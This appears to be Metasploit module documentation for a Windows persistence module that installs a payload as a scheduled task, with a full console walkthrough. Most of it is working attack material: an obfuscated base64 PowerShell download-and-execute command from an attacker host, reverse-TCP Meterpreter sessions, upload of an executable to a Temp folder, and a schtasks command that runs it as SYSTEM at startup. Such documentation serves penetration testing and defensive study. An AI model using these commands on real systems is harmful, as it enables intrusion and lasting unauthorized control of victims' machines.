Vulnerable Application
This module establishes persistence by creating a scheduled task to run a payload.
Verification Steps
get session on target with admin/system privs
use exploit/windows/persistence/task_scheduler
set payload <payload>
set lport <lport>
set lhost <lhost>
exploit
Options
PAYLOAD_NAME
Name of payload file to write. Random string as default.
TASK_NAME
The name of task. Random string as default.
Advanced Options
ScheduleType
Schedule frequency for the new created task. Options are: MINUTE, HOURLY, DAILY, WEEKLY, MONTHLY, ONCE, ONSTART, ONLOGON, ONIDLE.
ScheduleModifier
Schedule frequency modifier to define the amount of ScheduleType. This defines the amount of minutes/hours/days/weeks/months, depending on the ScheduleType value. When ONIDLE type is used, this represents how many minutes the computer is idle before the task starts. This value is not used with ONCE, ONSTART and ONLOGON types.
Scenarios
Windows 10 1909 (10.0 Build 18363)
resource (/root/.msf4/msfconsole.rc)> setg verbose true
verbose => true
resource (/root/.msf4/msfconsole.rc)> setg lhost 2.2.2.2
lhost => 2.2.2.2
resource (/root/.msf4/msfconsole.rc)> setg payload cmd/linux/http/x64/meterpreter/reverse_tcp
payload => cmd/linux/http/x64/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> use exploit/multi/script/web_delivery
[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> set target 2
target => 2
resource (/root/.msf4/msfconsole.rc)> set srvport 8085
srvport => 8085
resource (/root/.msf4/msfconsole.rc)> set uripath w2
uripath => w2
resource (/root/.msf4/msfconsole.rc)> set payload payload/windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> set lport 4449
lport => 4449
resource (/root/.msf4/msfconsole.rc)> run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 2.2.2.2:4449
[*] Using URL: http://2.2.2.2:8085/w2
[*] Server started.
[*] Run the following command on the target machine:
powershell.exe -nop -w hidden -e WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAA9AFsATgBlAHQALgBTAGUAYwB1AHIAaQB0AHkAUAByAG8AdABvAGMAbwBsAFQAeQBwAGUAXQA6ADoAVABsAHMAMQAyADsAJABhADYAeQA3AFUAPQBuAGUAdwAtAG8AYgBqAGUAYwB0ACAAbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAA7AGkAZgAoAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAFAAcgBvAHgAeQBdADoAOgBHAGUAdABEAGUAZgBhAHUAbAB0AFAAcgBvAHgAeQAoACkALgBhAGQAZAByAGUAcwBzACAALQBuAGUAIAAkAG4AdQBsAGwAKQB7ACQAYQA2AHkANwBVAC4AcAByAG8AeAB5AD0AWwBOAGUAdAAuAFcAZQBiAFIAZQBxAHUAZQBzAHQAXQA6ADoARwBlAHQAUwB5AHMAdABlAG0AVwBlAGIAUAByAG8AeAB5ACgAKQA7ACQAYQA2AHkANwBVAC4AUAByAG8AeAB5AC4AQwByAGUAZABlAG4AdABpAGEAbABzAD0AWwBOAGUAdAAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAQwBhAGMAaABlAF0AOgA6AEQAZQBmAGEAdQBsAHQAQwByAGUAZABlAG4AdABpAGEAbABzADsAfQA7AEkARQBYACAAKAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADIALgAyADIAOAA6ADgAMAA4ADUALwB3ADIALwB0AGIARwBHAGMAVgBOAEoATgAnACkAKQA7AEkARQBYACAAKAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADIALgAyADIAOAA6ADgAMAA4ADUALwB3ADIAJwApACkAOwA=
msf exploit(multi/script/web_delivery) >
[*] 1.1.1.1 web_delivery - Powershell command length: 3659
[*] 1.1.1.1 web_delivery - Delivering Payload (3659 bytes)
[*] Sending stage (230982 bytes) to 1.1.1.1
[*] Meterpreter session 1 opened (2.2.2.2:4449 -> 1.1.1.1:49934) at 2025-10-26 16:11:31 -0400
Session info
msf exploit(multi/script/web_delivery) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > sysinfo
Computer : WIN10PROLICENSE
OS : Windows 10 1909 (10.0 Build 18363).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x64/windows
meterpreter > getuid
Server username: WIN10PROLICENSE\windows
meterpreter > background
[*] Backgrounding session 1...
Persistence
msf exploit(multi/script/web_delivery) > use exploit/windows/persistence/task_scheduler
[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
msf exploit(windows/persistence/task_scheduler) > set session 1
session => 1
msf exploit(windows/persistence/task_scheduler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(windows/persistence/task_scheduler) > exploit
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 2.2.2.2:4444
msf exploit(windows/persistence/task_scheduler) > [*] Running automatic check ("set AutoCheck false" to disable)
[*] [Task Scheduler] Trying to get SYSTEM privilege
[*] [Task Scheduler] Got SYSTEM privilege
[+] The target appears to be vulnerable. Likely exploitable
[*] Payload (7168 bytes) uploaded on WIN10PROLICENSE to C:\Users\windows\AppData\Local\Temp\CLxSZIsj.exe
[*] Creating task: svuJIW
[*] [Task Scheduler] executing command: schtasks /create /tn "svuJIW" /tr "C:\Users\windows\AppData\Local\Temp\CLxSZIsj.exe" /sc ONSTART /ru SYSTEM /f
[*] Starting task: svuJIW
[*] [Task Scheduler] executing command: schtasks /run /tn svuJIW
[*] Sending stage (188998 bytes) to 1.1.1.1
[*] Meterpreter-compatible Cleanup RC file: /root/.msf4/logs/persistence/WIN10PROLICENSE_20251026.1226/WIN10PROLICENSE_20251026.1226.rc
[*] Meterpreter session 2 opened (2.2.2.2:4444 -> 1.1.1.1:49935) at 2025-10-26 16:12:29 -0400
Cleanup
msf exploit(windows/persistence/task_scheduler) > sessions -i 2
[*] Starting interaction with 2...
meterpreter > run /root/.msf4/logs/persistence/WIN10PROLICENSE_20251026.1226/WIN10PROLICENSE_20251026.1226.rc
[*] Processing /root/.msf4/logs/persistence/WIN10PROLICENSE_20251026.1226/WIN10PROLICENSE_20251026.1226.rc for ERB directives.
resource (/root/.msf4/logs/persistence/WIN10PROLICENSE_20251026.1226/WIN10PROLICENSE_20251026.1226.rc)> execute -f cmd.exe -a "/c schtasks /delete /tn svuJIW /f"
Process 560 created.
resource (/root/.msf4/logs/persistence/WIN10PROLICENSE_20251026.1226/WIN10PROLICENSE_20251026.1226.rc)> rm C:/Users/windows/AppData/Local/Temp/CLxSZIsj.exe
[-] stdapi_fs_delete_file: Operation failed: Access is denied.
meterpreter >
